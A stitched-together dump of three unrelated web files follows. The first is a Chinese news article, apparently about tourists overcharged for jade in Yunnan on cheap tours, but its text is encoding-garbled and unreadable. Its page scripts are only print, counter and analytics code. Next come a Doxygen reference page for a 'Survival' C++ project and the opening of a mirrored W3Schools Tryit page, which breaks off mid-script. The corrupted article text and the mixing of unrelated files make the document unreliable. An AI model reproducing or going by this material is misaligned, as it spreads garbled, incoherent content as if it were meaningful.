<p>¡¡¡¡Õë¶ÔÓñʯÊг¡ÖеÄÖÖÖÖÂÒÏ󣬱¾°æ½«Á¬ÐøÍƳö3ƪ±¨µÀ£¬Îª´ó¼Ò½âÒÉÊÍ»ó£¬ÕùÈ¡Èøü¶àÈËÃ÷Ã÷°×°×Ïû·Ñ£¬ÇåÇå³þ³þ¹ºÓñ¡£</p>
<p>¡¡¡¡ÒµÄÚÈËʿ˵£ºÓñ¿´ÓÐÔµÈË£¬×ÊÔ´ÓÐÏÞÂòµ½¾ÍÊÇ׬µ½¡£¿É²»ÉÙÏû·ÑÕßÈ´·¢ÏÖ£¬ÂòÁ˾ͱ»¿ÓÁË¡£ÈçºÎ±ÜÃâ±»¿Ó£¿×¨¼ÒÌáʾ£º²»¶®ÐÐÄú¿ÉǧÍò±ðÂÒ³öÊÖ£¡</p>
<p>¡¡¡¡¼ÇÕß½üÈÕÔÚÔÆÄϵ÷²é·¢ÏÖ£¬ÔÆÄÏôä´ä½»Ò×Öмٻõ²»¶à£¬µ«Ë®·Ö²»ÉÙ¡£</p>
<p>¡¡¡¡Ë®·ÖºÎÔÚ£¿ËïŮʿµÄÇ×Éí¾ÀúÕ¹ÏÖµÃÁÜÀ쾡Ö¡£</p>
<p>¡¡¡¡±¨Á˵ͼÛÍÅ£¬ÂòÁ˸߼ÛÓñ</p>
<p>¡¡¡¡½ñÄê4Ô³õ£¬À´×ÔËÄ´¨µÄËïŮʿºÍÕÉ·òÒ»Æðµ½ÔÆÄÏÂÃÓΡ£¿¼Âǵ½×ÔÓÉÐн»Í¨²»±ã£¬±ã±¨Ãû²Î¼ÓÁËijÂÃÐÐÉçµÄ¡°Ê¯ÁÖÒ»ÈÕÓΡ±ÏîÄ¿¡£</p>
<p>¡¡¡¡¡°×¨³µ½ÓËÍ¡¢¾°ÇøÃÅÆ±¼ÓÁ½¶Ù·¹£¬Ã¿ÈËÍŷѲÅÊÕ70Ôª£¬ÊÇʯÁÖ¾°Çø175ÔªÍøÂ繺Ʊ·ÑÓõÄÁãÍ·¡£¡±ËïŮʿ¾õµÃ±ãÒË£¬±ã´òµç»°²ÎÁËÍÅ¡£</p>
<p>¡¡¡¡µÚ¶þÌìÔçÉÏ8µã×óÓÒ£¬ÂÃÐÐÉç׼ʱµ½±ö¹Ý½ÓÉÏÁËËïŮʿ·ò¸¾¡£ÉÏÎçÓÎÀÀʯÁÖ¾°Çø£¬µ¼ÓηþÎñÖܵ½£¬ÈÃËïŮʿ¾õµÃ¡°ÕâÍű¨µÃֵͦ¡±¡£</p>
<p>¡¡¡¡²»¹ýÉÏÎçÖ»ÊÇ¿ªÊ¼¡£</p>
<p>¡¡¡¡ÏÂÎçÒ»ÉÏ´ó°Í£¬µ¼ÓαãÌô׼ʱ»ú˵ÆðÁËÔÆÄÏÓñʯ¡£ÔÚ³µÉÏ£¬µ¼ÓÎÏÖÉí˵·¨£¬³Æ×Ô¼ºÊÖÉϵıùÓñïí×ÓÂòʱ2000¶àÔª£¬Èç½ñÒѾÉýÖµµ½ÁËÁ½ÈýÍò¡£¡°Âò·¿²»ÈçÂòÓñ£¬·¿×ÓËæÊ±¿ÉÒÔÂò£¬µ«ºÃÓñ¿ìÒª¿ª²ÉÍêÁË£¬ÒÔºóÔÙÄÑÂòµ½£¬ÏÖÔÚÂòÁ˿϶¨ÉýÖµ¡£¡±¾¹ýµ¼ÓÎÒ»·¬ÅÔÇòà»÷£¬ËïŮʿºÍ³µÉϵÄÓοÍÓÐЩÐ͝¡£</p>
<p>¡¡¡¡Ëæºó£¬µ¼Óν«ËïŮʿһÐдøµ½ÁËÒ»¼ÒÂÃÓÎÉÌÆ·¹ºÎïµê£¬³Æ¸ÃµêÎªÔÆÄÏÊ¡ÄÚ´óÆ·ÅÆ£¬´ó¼Ò¿É·ÅÐĹºÂò¡£</p>
<p>¡¡¡¡¡°ÉÌµê¹æÄ£ºÜ´ó£¬¾õµÃÕæÊǵ½ÁËÓñµÄ¼ÒÏç¡£¡±¿´×ÅÁÕÀÅÂúÄ¿µÄÓñʯ£¬ËïŮʿºÜ¿ìÑ¡ÖÐÁËÒ»¸öôä´äÊÖïí¡£Æð³õËý»¹ÓÐһЩ¹ËÂÇ£¬µ£ÐÄÊÖïíÊǼٵ쬲»¹ýÏúÊÛÈËÔ±ÌØÒâÄóöÒ»Õżø¶¨Ö¤ÊéÈÃËïŮʿȷÈÏ¡£¡°ÉÏÃæÐ´×ÅÖйúôä´äÖʼìÑо¿ÖÐÐÄ¡¢ÌìÈ»ôä´äÊÎÆ·ºÏ¸ñÖ¤Ê飬»¹±ê×¢ÁËÔÆÄÏÊ¡Ö鱦ÓñʯÖÊÁ¿¼à¶½¼ìÑéÑо¿ÔºµÄµØÖ·ºÍµç»°Ö®À࣬¸Ð¾õͦ¹æ·¶¡£¡±</p>
<p>¡¡¡¡×îÖÕ£¬ËïŮʿ°´ÕÕ±ê¼Û7800Ôª¹ºµÃÊÖïí£¬ÏúÊÛÈËÔ±³ö¾ßÁËһʽÁ½ÁªµÄƱ¾Ý£¬Ò»·ÝÓÉËïŮʿÁô´æ£¬Ò»·ÝÈý»¸øµ¼ÓΡ£¡°Í¬ÐеÄÓοͻù±¾¶¼ÂòÁË£¬ÉÙÔò¼¸Ç§£¬¶àÔòÁ½ÈýÍò¡£¡±ËïŮʿ˵¡£</p>
<p>¡¡¡¡ËïŮʿÂòµ½µÄÓñµÄÈ·ÊÇÕæµÄ¡£ÔÚºóÐø²É·ÃÖУ¬¼ÇÕß×ß·ÃÔÆÄ϶à¸öÓñʯ½»Ò×Êг¡·¢ÏÖ£¬Õý¹æÉ̵êÖÐûÓмÙÓñ³öÊÛ¡£</p>
<p>¡¡¡¡¡°ÕâÄêÍ·£¬Ë»¹Âô¼ÙÓñ°¡£¿¡±ÒµÄÚÈËÊ¿¸æËß¼ÇÕߣ¬Óñʯ¼ø¶¨Õæ¼Ù²¢²»ÄÑ£¬ÓÉÓÚ°´±¶·£¿î£¬¼Û¸ñÔ½¸ß·£µÃÔ½¶à£¬´ó¶àÊýÓñÆ÷µê²»»áîú¶ø×ßÏÕ¡£</p>
<p>¡¡¡¡Ô½ÊÇÂÃÓιºÎïµê£¬¼Û¸ñעˮԽÑÏÖØ</p>
<p>¡¡¡¡È»¶ø£¬Âòµ½²¢²»Ò»¶¨×¬µ½¡£</p>
<p>¡¡¡¡»Øµ½³É¶¼£¬ËïŮʿ½«ÊÖïíÄõ½³É¶¼½ðÒøÓñÆ÷ר¹ñ×ö¹À¼Û¼ø¶¨£¬µÃµ½µÄ½á¹ûÈÃËïŮʿʮ·ÖÐĺ®£¬Õâö±ê¼Û7800ÔªµÄôä´äÊÖïí£¬Õý³£Êг¡¼Û²»¹ýÈýËİÙÔª¡£</p>
<p>¡¡¡¡¾¡¹ÜÖªµÀר¹ñµÄ¼ø¶¨Ò²Î´±Ø¾«×¼£¬µ«ËïŮʿÒÀÈ»ºÜÆø·ß£º¡°Õâ²î¾àÌ«´óÁË£¬ÎÒÖªµÀÂÃÓξ°µã¿Ï¶¨ÊÇÒª¹óһЩµÄ£¬µ«Ã»Ïëµ½²îÕâô¶à¡£ÕâÒ»¸öÊÖïí¶¥µÃÉÏÎÒÁ½¸öÔ¹¤×ÊÄØ£¡¡±</p>
<p>¡¡¡¡¡°Ò»°ãÀ´Ëµ£¬ÓñÆ÷µê±ê¼Û±ÈÒµÄÚ¼Û¸ñ¸ß¸öÈýËı¶ºÜÕý³££¬É̼ÒÍùÍùͨ¹ýÐé±ê¼Û¸ñIJȡ±©Àû¡£¡±ÒµÄÚÈËÊ¿±íʾ£¬Ô½ÊÇÂÃÓιºÎïµê£¬¼Û¸ñעˮԽÑÏÖØ¡£</p>
<p>¡¡¡¡¡°µ¼Óλ¹ÒªÄÃÌá³É²»ÊÇ£¬²»È»Ë¸øÄã´ø¿ÍÔ´£¿¡±¸ÃÒµÄÚÈËÊ¿¸æËß¼ÇÕߣ¬¼¸ÄêÇ°Ôø¾Óе¼ÓδøÁËÒ»¸öÍÅ£¬Õâ¸öÍŹâÂòÓñ¾Í»¨ÁËÉÏǧÍò£¬µ¼ÓÎÄÃÌá³É¾ÍÓм¸°ÙÍò¡£</p>
<p>¡¡¡¡¡°È¥ÓñÆ÷µêÄÄÓв»¿³¼ÛµÄ£¿¡±ÒµÄÚÈËÊ¿±íʾ£¬Èç¹û²»¶®ÐУ¬²»½¨ÒéÂÒ³öÊÖÂòÓñ£¬¼´±ãÊÇÒµÄÚÈËÊ¿£¬Ò²Ö»ÄÜ˵ij¿éÓñµÄ´ó¸Å¼Û¸ñ¡£¡°¼¸°ÙµÄºÍ¼¸Ç§µÄÓñÎÒÃÇ»¹ÄÜÇø·Ö£¬µ«µ½µ×ÖµÈýǧ»¹ÊÇÎåÇ§Õæ²»ºÃÇø·Ö¡£¡±</p>
<p>¡¡¡¡ÔÚ±±¾©´ÓÊÂÊ×ÊÎÖÆ×÷µÄÓÚÀ×Ò²¸æËß¼ÇÕߣ¬Óñʯ¡¢ôä´äÓë¹ú¼Ê¹«Èϵı¦Ê¯²»Í¬£¬×êʯµÈ±¦Ê¯¶¼Óйú¼Ê¶¨¼Û±ê×¼£¬¶øÓñʯÒòΪ¡°Ã¿¿éÓñ¶¼²»Í¬¡±£¬È±ÉÙ¹«ÈϵĹÀ¼Û±ê×¼¡£¡°ÎÒÃÇ×Ô¼ºÒ²ÊÇÔ¼¼¸Î»Í¬ÐÐÒ»Æð½ø»õ¡£Í¬Ò»¼þÓñÆ÷´ó¼Ò·ÖÍ·¸ø¸ö¹À¼Û£¬È»ºóȡƽ¾ù¼Û½ø»õ¡£¡±</p>
<p>¡¡¡¡¼´±ãÊÇÒµÄÚ½»Ò×£¬Ò²´æÔÚÄ£ºýµØ¶Î¡£¡°¾ÙÀýÀ´Ëµ£¬Ä³¿éÓñ´ó¸ÅÖµ¼¸Íò¿é£¬¿ÉÊǵ½µ×ÖµÁ½Íò¡¢ÎåÍò»¹ÊǰËÍò£¬¿¿µÄÍùÍùÊÇÂòÂôË«·½ÌÖ¼Û»¹¼Û£¬¶ø²»ÊÇÏñ»Æ½ð¡¢×êʯһÑù¼Û¸ñ»ù±¾×¼È·¡£¡±ÓÚÀ×˵¡£</p>
<p>¡¡¡¡Êµ¼ÊÉÏ£¬ÔڵͼÛÓÎģʽÏ£¬µ¼ÓεÄÖ÷ÒªÊÕÈëÀ´Ô´±ãÊǹºÎïÌá³É£¬¶øôä´äµÈÓÉÓÚÇá±ã¼Û¸ß£¬³ÉΪ֧³ÅµÍ¼ÛÓεÄÖØÒªÖ§Öù¡£¡°Ìá³É°Ù·ÖÖ®ÈýËÄÊ®ºÜÕý³££¬¸ßµÄÄܵ½70%¡£¡±ÒµÄÚÈËÊ¿¸æËß¼ÇÕߣ¬²»½öÊǵͼÛÍÅ´æÔڸ߼۹ºÎïÏÖÏ󣬼´±ãÊǾ«Æ·ÍÅÒ²ÄÑÃâ±»´øµ½¹ºÎïµê¡£Ëæ×ÅÔ½À´Ô½¶àÈËÃ÷°×Á˼۸ñÐé¸ß¶ø²»ÔÙ¹ºÎµ¼ÓκÍÓοÍì¶Üʱ³£¼ûÖ¶Ë¡£</p>
<p>¡¡¡¡¡°Î¬È¨³É±¾Ì«¸ß£¬¾Íµ±Âò¸ö½Ìѵ°É¡±</p>
<p>¡¡¡¡µÃÖª×Ô¼º¿÷´óÁË£¬ËïŮʿ¾ö¶¨Î¬È¨¡£</p>
<p>¡¡¡¡ËïŮʿÊ×ÏÈÖµçÂÃÐÐÉ磬ÂÃÐÐÉç´ðÓ¦°ïËïŮʿе÷¡£ËÖªÉ̼ÒÈ´³Æ¡°ÃÀÓñÎÞ¼Û£¬Ïà¼ûÊÇÔµ¡±£¬¾Ü¾øÍË»õ¡£¡°É̼Ò˵ÒòΪ²»ÊÇÖÊÁ¿ÎÊÌ⣬ÓñÆ÷²»Í˲»»»£»ÒªÊÇÖÊÁ¿ÎÊÌ⣬ÄǵÃÌṩרҵ²¿ÃÅÖÊÁ¿¼ø¶¨Êé¡£¡±ÓÉÓÚרҵ»ú¹¹¼ø¶¨¼Û¸ñ²»·Æ£¬ÇÒÐèÒªµÈ´ý¼¸¸ö¹¤×÷ÈÕ²ÅÄÜÄõ½¼ø¶¨Ö¤Ê飬ËïŮʿ¾õµÃÂé·³£¬Ö»ÄÜ×÷°Õ¡£</p>
<p>¡¡¡¡¡°Õâ¸öÊÖïí¾ÍÊÇ×êÁËÕæôä´ä¼Û¸ñÐé¸ß¡¢²»Í¸Ã÷µÄ¿Õ×Ó£¡¡±ËïÅ®Ê¿Æø·ßµØËµ£¬¡°×¨Òµ»ú¹¹¼ø¶¨³öÀ´È·ÊµÊÇA»õôä´ä£¬ËäÈ»ÓëÉ̼ұêÃ÷µÄÒ»Ö£¬µ«ôä´äÕâ¶«Î÷¾ÍËãÊÇA»õ¼Û¸ñÒ²¹ó¼ú²»Ò»£¬¼ø¶¨»ú¹¹Ö»¼øÕæ¼Ù£¬ÓÖ²»Äܼø¶¨³öôä´äµÄÈ·Çм۸ñ£¬ÍâµØÓοÍÏëҪάȨ×Åʵ²»Òס£¡±</p>
<p>¡¡¡¡¾¹ý¼¸´Î½»É棬É̼Ò×îÖÕ½öͬÒâËïŮʿ¿ÉÒÔ½øÐÐÉÌÆ·»»¹º£¬µ«»»¹º¼Û¸ñ±ØÐëÔÚ5000ÔªÒÔÉÏ£¬Èô»»¹ºµÄÉÌÆ·¼Û¸ñ¸ßÓÚÔÀ´µÄÎïÆ·£¬»¹ÐèÒª²¹²î¼Û¡£¡°ÎÒÒѾ֪µÀËûµêÀïµÄôä´ä¼Û¸ñ²»Êµ£¬ÎÒÔÙ»»Ò²Ã»ÒâÒå°¡£¡¡±ËïŮʿ˵¡£</p>
<p>¡¡¡¡ÄÑάȨµÄ²¢²»½ö½öÊÇÍâµØÓο͡£ÓÉÓÚôä´äÊÛ³öºóÊÇ·ñÈÔÊÇÔÎï²»Ò×±æ±ð£¬¼ÓÖ®¼Û¸ñÊÜ¶à·½ÃæÒòËØÓ°Ï죬ÇÒÒµÄÚÆÕ±éÈϿɡ°Ï²»¶¼Û¡±£¨¼´¶ÔÓÚij¿éôä´ä£¬¼×¿ÉÄÜÈÏΪֵÁ½Íò£¬µ«ÒÒÌØ±ðϲ»¶ôä´äµÄij¸öÌØµã£¬Ô¸Òâ³ö¼ÛÊ®Íò£©£¬Òò´Ëôä´äÐÐÒµ´æÔÚ¡°²»ÍËÖ»»»¡±µÄÐÐÒµ¹æÔò¡£</p>
<p>¡¡¡¡ÔÚÓëÉ̼ҹµÍ¨ÎÞ¹ûºó£¬ËïŮʿÏòÓйز¿Ãŵ绰ͶËß¡£¡°¶Ô·½Ñ¯ÎÊÁËÏêϸ¾¹ýºÍÏà¹ØÐÅÏ¢ºó˵ÒѾ±¸°¸£¬»á¶½´Ùϼ¶²¿Ãůߏö¹¤×÷ÈÕÄÚ´¦ÀíͶËß½á¹û£¬²¢¸øÎһص绰¡£¡±²»¹ýËïŮʿ×îÖÕµÈÀ´µÄÈ´ÊÇèÃÎÞÒôÐÅ¡£</p>
<p>¡¡¡¡¡°ÎÒÔڳɶ¼£¬É̼ÒÔÚÔÆÄÏ£¬ÎÒ×ܲ»ÄÜΪÁËÒ»¸ö¼¸Ç§µÄïí×ÓÓÖÅܵ½ÔÆÄÏȥͶËß°É£¬»¹²»¹»ÎÒÀ´»Ø·É»úƱºÍʳË޷ѵģ¬ÒìµØÎ¬È¨³É±¾Ì«¸ßÁË£¬ÎÒ¼ÒÀïÈ˺ÍÉí±ßµÄͬʶ¼ËµËãÁË£¬¾Íµ±Âò¸ö½Ìѵ°É£¡¡±ËïŮʿ˵£¬¡°ÎÒºóÀ´Ï룬¿ÉÄܾÍÊÇÒòΪÂÃÓΣ¬¹Ë¿ÍÒ»×ß¾ÍÏà¸ôǧÀËùÒÔÄÇЩÉ̼ҲÅËÁÒâÍýΪ¡£¡±</p><ScRIpT type="text/javaScRIpT">// <![CDATA[
media_span_url('http://paper.people.com.cn/rmrb/html/2016-08/08/nw.D110000renmrb_20160808_1-10.htm')
//]]></ScRIpT>
</p>
</span></span></td>
</tr>
</table></td>
</tr>
</tbody>
</table><!--endprint-->
<table width="680" height="20" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td height="5"></td>
</tr>
</tbody>
</table>
<table width="680" height="20" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td height="5" align="right">¡¾<a href='#' onclick="preview()">Ô¤ÀÀ²¢´òÓ¡</a>¡¿¡¡/¡¡¡¾<a href="javaScRIpT:window.close();">¹Ø±Õ´°¿Ú</a>¡¿</td>
</tr>
</tbody>
</table>
<ScRIpT language="javaScRIpT">
function preview() {
bdhtml=window.document.body.innerHTML;
sprnstr="<!--startprint-->";
eprnstr="<!--endprint-->";
prnhtml=bdhtml.substr(bdhtml.indexOf(sprnstr)+17);
prnhtml=prnhtml.substring(0,prnhtml.indexOf(eprnstr));
window.document.body.innerHTML=prnhtml;
window.print();
}
</ScRIpT>
<table width="680" height="20" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td height="5" align="right"><!-- GWD SHARE BEGIN µ×²¿ºáÌõ·ÖÏí´úÂë-->
<div class="mainShareDiv_24">
<a href="//share.gwd.gov.cn/" target="_blank"><div id="shareLeftLink"></div></a>
<div id="gwdShare_con_1">
<div class="gwdshare_t gwds_tools_24 get-codes-gwdshare">
<a class="gwds_people gwds_bottom_leftbutton"></a>
<a class="gwds_tsina gwds_bottom_centerbutton"></a>
<a class="gwds_tqq gwds_bottom_centerbutton"></a>
<span class="gwds_more gwds_bottom_more"></span>
</div>
</div>
</div>
<!-- GWD SHARE END --></td>
</tr>
</tbody>
</table></td>
</tr>
</table>
<div style="margin:0 auto; width:1000px; border:none; background:#f2f2f2; text-align:center; padding:10px 0" align="center">
<p style="height:20px; line-height:20px; font-size:12px; font-family:'ËÎÌå'; text-align:center;">Ö÷°ìµ¥Î»£ºÍ©°ØÏØÕþ¸®°ì¹«ÊÒ¡¡½¨Õ¾Î¬»¤£ºÍ©°ØÏصç×ÓÕþÎñ°ì¹«ÊÒ¡¡µç»°£º0377-68219821¡¡E-mail£ºtbxzfyx@163.com</p>
<p style="height:20px; line-height:20px; font-size:12px; font-family:'ËÎÌå'; text-align:center;"><span style="height:20px; line-height:20px; font-size:12px; font-family:'ËÎÌå'; text-align:center;">±¾Õ¾ÄÚÈÝδ¾Ðí¿É£¬ÇëÎð×ªÔØ¡¡¡¡±¸°¸ºÅ£ºÔ¥ICP±¸13018982</span>
<span style="height:20px; line-height:20px; font-size:12px; font-family:'ËÎÌå'; text-align:center;"><ScRIpT type='text/javaScRIpT' src='http://wm.01ny.cn/jsq/index.php?catid=5102'></ScRIpT></span>
</p>
<div style="width:300px;margin:0 auto; padding:0;">
<a target="_blank" href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=41133002000101" style="display:inline-block;text-decoration:none;height:20px;line-height:20px;"><img src="/gongan.png" style="float:left;"/><p style="float:left;height:20px;line-height:20px;margin: 0px 0px 0px 5px; color:#939393;">Ô¥¹«Íø°²±¸ 41133002000101ºÅ</p></a>
</div>
<p style="height:25px; line-height:25px; font-size:12px; font-family:'ËÎÌå'; text-align:center;"><span style="line-height:25px;">Copyright 2004 -
<ScRIpT type="text/javaScRIpT">var copyY=new Date();document.write(copyY.getYear())</ScRIpT>
</span>¡¡<a href="/admin.php" target="_blank" class="navlist">¹ÜÀíµÇ½</a></p>
<div style="position:relative; width:90px; left:-5px; top:-80px; margin-bottom:-40px; float:left;"><ScRIpT type="text/javaScRIpT">document.write(unescape("%3Cspan id='_ideConac' %3E%3C/span%3E%3CScRIpT src='http://dcs.conac.cn/js/17/263/1698/40843970/CA172631698408439700001.js' type='text/javaScRIpT'%3E%3C/ScRIpT%3E"));</ScRIpT></div>
</div>
<!--Á¿»¯´úÂ벿Êð·½°¸-->
<ScRIpT type='text/javaScRIpT' src='http://static.gridsumdissector.com/js/Clients/GWD-802542-575F63/gs.js'></ScRIpT>
<!--Á¿»¯´úÂ벿Êð·½°¸-->
<div id="guanbi" style="width: 204px; height: 310px; position: fixed; top: 210px; right: 30px; display: block; z-index: 100; ">
<!-- GWD SHARE BEGIN Ò³ÃæÓҲม¶¯·ÖÏí´úÂë-->
<div style="position:relative;float:right;">
<div id="gwdShare_win_2">
<div id="gwdShare_con_2" style="display:none;height:51px;">
<div class="gwdshare_t gwds_tools_24 get-codes-gwdshare">
<a class="gwds_people gwds_right_button"></a>
<a class="gwds_tsina gwds_right_button"></a>
<a class="gwds_tqq gwds_right_button"></a>
<span class="gwds_more gwds_right_more"></span>
</div>
</div>
</div>
</div>
<!-- GWD SHARE END -->
<ScRIpT>
function guanbi(){
var d=document.getElementById('guanbi');
d.style.display="none";
}
</ScRIpT>
</body>
</html>
<ScRIpT type="text/javaScRIpT"></ScRIpT> |
Documentation/html/da/dfc/Nucleus__Integral_8h.html | batuff/Survival | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.6"/>
<title>“Survival”: src/Nucleus_Integral.h File Reference</title>
<link href="../../tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="../../jquery.js"></script>
<script type="text/javascript" src="../../dynsections.js"></script>
<link href="../../search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="../../search/search.js"></script>
<script type="text/javascript">
$(document).ready(function() { searchBox.OnSelectItem(0); });
</script>
<link href="../../doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">“Survival”
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.6 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "../../search",false,'Search');
</script>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="../../index.html"><span>Main Page</span></a></li>
<li><a href="../../namespaces.html"><span>Namespaces</span></a></li>
<li><a href="../../annotated.html"><span>Classes</span></a></li>
<li class="current"><a href="../../files.html"><span>Files</span></a></li>
<li>
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="../../search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Search" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="../../search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="../../files.html"><span>File List</span></a></li>
<li><a href="../../globals.html"><span>File Members</span></a></li>
</ul>
</div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
<a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark"> </span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark"> </span>Classes</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark"> </span>Namespaces</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark"> </span>Files</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark"> </span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(5)"><span class="SelectionMark"> </span>Variables</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(6)"><span class="SelectionMark"> </span>Macros</a></div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="../../dir_68267d1309a1af8e8297ef4c3efbcdba.html">src</a></li> </ul>
</div>
</div><!-- top -->
<div class="header">
<div class="summary">
<a href="#nested-classes">Classes</a> |
<a href="#namespaces">Namespaces</a> </div>
<div class="headertitle">
<div class="title">Nucleus_Integral.h File Reference</div> </div>
</div><!--header-->
<div class="contents">
<div class="textblock"><code>#include "<a class="el" href="../../db/d9f/Nucleus_8h_source.html">Nucleus.h</a>"</code><br/>
</div><div class="textblock"><div class="dynheader">
Include dependency graph for Nucleus_Integral.h:</div>
<div class="dyncontent">
<div class="center"><img src="../../d3/d28/Nucleus__Integral_8h__incl.png" border="0" usemap="#src_2Nucleus__Integral_8h" alt=""/></div>
<map name="src_2Nucleus__Integral_8h" id="src_2Nucleus__Integral_8h">
<area shape="rect" id="node2" href="../../db/d9f/Nucleus_8h.html" title="Nucleus.h" alt="" coords="41,80,121,107"/></map>
</div>
</div><div class="textblock"><div class="dynheader">
This graph shows which files directly or indirectly include this file:</div>
<div class="dyncontent">
<div class="center"><img src="../../d0/dd3/Nucleus__Integral_8h__dep__incl.png" border="0" usemap="#src_2Nucleus__Integral_8hdep" alt=""/></div>
<map name="src_2Nucleus__Integral_8hdep" id="src_2Nucleus__Integral_8hdep">
<area shape="rect" id="node2" href="../../d4/d1f/Calculus_8cpp.html" title="src/Calculus.cpp" alt="" coords="5,80,125,107"/><area shape="rect" id="node3" href="../../d0/dd2/Nucleus__Integral_8cpp.html" title="src/Nucleus_Integral.cpp" alt="" coords="150,80,316,107"/><area shape="rect" id="node4" href="../../db/d44/Nucleus__MKM_8cpp.html" title="src/Nucleus_MKM.cpp" alt="" coords="341,80,495,107"/></map>
</div>
</div>
<p><a href="../../da/dfc/Nucleus__Integral_8h_source.html">Go to the source code of this file.</a></p>
<table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="nested-classes"></a>
Classes</h2></td></tr>
<tr class="memitem:"><td class="memItemLeft" align="right" valign="top">class  </td><td class="memItemRight" valign="bottom"><a class="el" href="../../d7/d3d/classSurvival_1_1Nucleus__Integral.html">Survival::Nucleus_Integral</a></td></tr>
<tr class="memdesc:"><td class="mdescLeft"> </td><td class="mdescRight">Implements a nucleus as a 2D circular object and provides methods to evaluate the number of lethal events observed. <a href="../../d7/d3d/classSurvival_1_1Nucleus__Integral.html#details">More...</a><br/></td></tr>
<tr class="separator:"><td class="memSeparator" colspan="2"> </td></tr>
</table><table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="namespaces"></a>
Namespaces</h2></td></tr>
<tr class="memitem:df/d88/namespaceSurvival"><td class="memItemLeft" align="right" valign="top"> </td><td class="memItemRight" valign="bottom"><a class="el" href="../../df/d88/namespaceSurvival.html">Survival</a></td></tr>
<tr class="separator:"><td class="memSeparator" colspan="2"> </td></tr>
</table>
</div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Thu Apr 14 2016 11:05:38 for “Survival” by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="../../doxygen.png" alt="doxygen"/>
</a> 1.8.6
</small></address>
</body>
</html>
|
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/jsref/tryit586c.html | platinhom/ManualHom |
<!DOCTYPE html>
<html lang="en-US">
<!-- Mirrored from www.w3schools.com/jsref/tryit.asp?filename=tryjsref_win_settimeout_cleartimeout by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:28:05 GMT -->
<head>
<title>Tryit Editor v2.3</title>
<meta id="viewport" name='viewport'>
<script>
(function() {
if ( navigator.userAgent.match(/iPad/i) ) {
document.getElementById('viewport').setAttribute("content", "width=device-width, initial-scale=0.9");
}
}());
</script>
<link rel="stylesheet" href="../trycss.css">
<!--[if lt IE 8]>
<style>
.textareacontainer, .iframecontainer {width:48%;}
.textarea, .iframe {height:800px;}
#textareaCode, #iframeResult {height:700px;}
.menu img {display:none;}
</style>
<![endif]-->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','../../www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-3855518-1', 'auto');
ga('require', 'displayfeatures');
ga('send', 'pageview');
</script>
<script>
var googletag = googletag || {};
googletag.cmd = googletag.cmd || [];
(function() {
var gads = document.createElement('script');
gads.async = true;
gads.type = 'text/javascript';
var useSSL = 'https:' == document.location.protocol;
gads.src = (useSSL ? 'https:' : 'http:') +
'//www.googletagservices.com/tag/js/gpt.js';
var node = document.getElementsByTagName('script')[0];
node.parentNode.insertBefore(gads, node);
})();
</script>
<script>
googletag.cmd.push(function() {
